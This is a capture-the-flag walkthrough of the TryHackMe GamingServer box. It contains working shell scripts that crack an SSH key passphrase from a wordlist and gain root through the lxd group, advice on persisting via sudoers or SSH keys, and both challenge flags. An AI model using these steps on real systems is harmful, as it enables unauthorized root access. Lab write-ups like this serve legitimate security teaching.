TryHackMe: GamingServer is an easy boot2root challenge on TryHackMe. This challenge simulates a “gaming server built by amateurs with no experience in web development.” With an exposed, passphrase-protected RSA private key, we can crack the passphrase, gain a foothold on the server over SSH, and then abuse the user’s membership in the lxd group (LXD is the container manager that sits on top of LXC) to escalate privileges to root.
Information Gathering
As always, to start the information gathering phase of this challenge, we will use Nmap to scan all ports at the GamingServer’s IP address.
On this Ubuntu Linux machine, 2 out of the 65535 ports are open: port 22 is running OpenSSH 7.6p1 and port 80 is running Apache 2.4.29. By going to this IP address in our browser, we can see that the Apache web server is hosting a website called Draagan.
It looks like the gaming server’s website is still under construction.
Viewing the page source, we can see that the developers left a comment addressed to John. We can conclude that john is the user account we should be targeting during this assessment.
The overall functionality of this website is limited and does not give us a foothold onto the server by itself, so the next step is to look for directories and files the site does not link to.
Using a tool like Gobuster, we can enumerate the directories and files on the webserver. The results above show that the /uploads and /secret directories could hold valuable information.
Unless you want to read the hacker manifesto by The Mentor or look at a picture of a shocked Beaker from the Muppets, there isn’t any particular value in the manifesto.txt or meme.jpg files. The file of interest is dict.lst, a wordlist of common passwords that we save for later.
The /secret directory only has one file named secretKey. It contains a passphrase-protected RSA private key, which is exactly the kind of credential that can authenticate SSH access once the passphrase is known.
Exploitation
To start, we will copy the RSA private key into a file called id_rsa and set its permissions to 600 (SSH refuses to use a key that other users can read). Then we will use ssh2john.py to convert the id_rsa file into a hash format that John the Ripper can crack. Finally, using the dict.lst wordlist we copied from the /uploads directory (passed to john with --wordlist), we can crack the RSA private key passphrase.
After a couple of minutes, the RSA private key passphrase has been cracked: the passphrase is letmein.
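Cracking the passphrase is really just “try every word as the key-decryption passphrase until the key parses”. The following is an added example, not code from the original write-up: it reproduces the ssh2john plus john workflow with nothing but openssl, so you can see what john is checking for each candidate. The make_test_key helper builds a constructed, passphrase-protected key with a passphrase of letmein for demonstration; against the real challenge you would point crack_pem_passphrase at the downloaded secretKey and dict.lst instead.

```shell
#!/bin/sh
# Added example (not from the original write-up). Brute-forces the passphrase
# of a PEM-encoded, passphrase-protected RSA private key from a wordlist by
# asking openssl to decrypt the key with each candidate. This is the same
# check john performs after ssh2john extracts the key's encryption parameters.

# crack_pem_passphrase KEYFILE WORDLIST
# Prints the first passphrase in WORDLIST that decrypts KEYFILE and returns 0.
# Returns 1 if no candidate works, 2 if the key is not encrypted at all.
crack_pem_passphrase() {
    key="$1"
    wordlist="$2"

    # Caveat: an unencrypted key "decrypts" with every passphrase, which would
    # wrongly report the first word in the list. Both the traditional
    # "Proc-Type: 4,ENCRYPTED" header and the PKCS#8 "BEGIN ENCRYPTED PRIVATE
    # KEY" header contain the word ENCRYPTED, so check for it first.
    if ! grep -q ENCRYPTED "$key"; then
        echo "key is not passphrase-protected, nothing to crack" >&2
        return 2
    fi

    # Read the wordlist line by line; the "|| [ -n ... ]" keeps a final line
    # that lacks a trailing newline.
    while IFS= read -r candidate || [ -n "$candidate" ]; do
        if [ -z "$candidate" ]; then
            continue
        fi
        # A wrong passphrase yields garbage that does not parse as a key, so
        # openssl exits non-zero; the right one parses and exits 0.
        if openssl rsa -in "$key" -passin "pass:$candidate" -noout >/dev/null 2>&1; then
            printf '%s\n' "$candidate"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# make_test_key OUTFILE PASSPHRASE
# Constructed test fixture: generates a fresh 2048-bit RSA key encrypted under
# PASSPHRASE so the cracker can be exercised offline without the challenge key.
make_test_key() {
    openssl genrsa -aes128 -passout "pass:$2" -out "$1" 2048 >/dev/null 2>&1 || return 1
    chmod 600 "$1"
}

# Usage against the real material:
#   crack_pem_passphrase ./id_rsa ./dict.lst
```

The whole wordlist is tried in order, so a hit on the 500th entry means 500 openssl invocations; john is far faster because it derives the decryption key in-process, but the decision rule (does the decrypted blob parse as a key?) is the same.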
Using the private key file, id_rsa, together with the cracked passphrase, we can then SSH into the machine as john. That’s where we can find the user.txt flag: a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e.
Post Exploitation
The last thing we need to do to complete this challenge is escalating our privileges to root and find the root.txt flag.
Unlike other privilege escalation challenges, the sudo -l command does not bear much information here, because it prompts for john’s password and we only have his SSH key, not his password.
However, we can upload a tool called linpeas.sh onto the server to search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. LinPEAS, Linux Privilege Escalation Awesome Script, is a great tool to automate the privilege escalation process.
As the legend states, anything highlighted in RED/YELLOW text is 95% likely to be a privilege escalation vector. The highlighted finding here is LXD, the open-source system container manager built on top of Linux Containers (LXC); john is a member of the lxd group, and members of that group can talk to the LXD daemon, which runs as root.
The LinPeas README file states that all of LinPeas’ checks are explained in book.hacktricks.xyz. This website has instructions on how to escalate our privileges to root because we are a part of lxd/lxc group.
Run the first block of commands (the image build) on your host machine, since the target has no internet access and no build tooling, then upload the resulting lxd.tar.xz and rootfs.squashfs files to the victim server.
After uploading the lxd.tar.xz and rootfs.squashfs files, we import the image into LXD, initialise a container from it with security.privileged=true (so root inside the container is root on the host rather than an unprivileged mapped uid), add a disk device that exposes the host’s root filesystem inside the container, and finally start the container and exec a shell in it to become root.
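The container steps above as one function, added here as an example and not part of the original write-up. It assumes lxd.tar.xz and rootfs.squashfs were built on the attacker host (for instance with distrobuilder) and already uploaded to the target; the image alias alpine, the container name privesc and the mount point /mnt/root are my choices, not values fixed by the challenge.

```shell
#!/bin/sh
# Added example, not from the original write-up: lxd group privilege
# escalation. Imports an uploaded image, starts a privileged container with
# the host's root filesystem mounted inside it, and drops into a shell there.
# Assumed inputs: lxd.tar.xz (metadata) and rootfs.squashfs (root filesystem)
# already present on the target. Alias/name/mount point are my choices.

# lxd_root_shell METADATA_TARBALL ROOTFS_SQUASHFS [ALIAS] [CONTAINER]
lxd_root_shell() {
    meta="$1"
    rootfs="$2"
    alias="${3:-alpine}"
    name="${4:-privesc}"

    if [ ! -f "$meta" ] || [ ! -f "$rootfs" ]; then
        echo "image files not found: $meta $rootfs" >&2
        return 1
    fi
    # lxc talks to the LXD unix socket; only root and the lxd group may use it,
    # so warn early instead of failing on the first lxc call.
    if ! id -nG 2>/dev/null | grep -qw lxd; then
        echo "warning: current user is not in the lxd group, lxc will be refused" >&2
    fi

    # 1. Register the uploaded image under a short alias.
    lxc image import "$meta" "$rootfs" --alias "$alias" || return 1
    # 2. Privileged container: no uid mapping, so uid 0 inside is uid 0 on the host.
    lxc init "$alias" "$name" -c security.privileged=true || return 1
    # 3. Expose the host's entire filesystem inside the container at /mnt/root.
    lxc config device add "$name" hostroot disk source=/ path=/mnt/root recursive=true || return 1
    lxc start "$name" || return 1
    # 4. Shell as root inside the container; the host's /root is at /mnt/root/root.
    lxc exec "$name" -- /bin/sh
}

# Usage on the target, from the directory holding the uploaded files:
#   lxd_root_shell ./lxd.tar.xz ./rootfs.squashfs
```

Inside the resulting shell you are root in the container, and because the host filesystem is mounted read-write you can read /mnt/root/root/root.txt, drop an SSH key into /mnt/root/root/.ssh, or edit /mnt/root/etc/sudoers to make the foothold persistent on the host itself.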
The last thing to do is to find the root.txt flag.
It took some time, but remember that the host’s filesystem is mounted under /mnt/root inside the container, so the host’s /root directory is /mnt/root/root, not the container’s own /root. Looking there reveals that the root.txt flag is 2e337b8c9f3aff0c2b3e8d4e6a7c88fc.
Conclusion
In conclusion, this challenge was really fun and seemed more realistic than previous challenges. People upload their RSA private keys to directories they think nobody will find all the time, and a weak passphrase on that key is no real protection once the file is exposed. Like I said above, it took some time to find the root flag, but that was better than just rushing over to the /root directory and finding it there.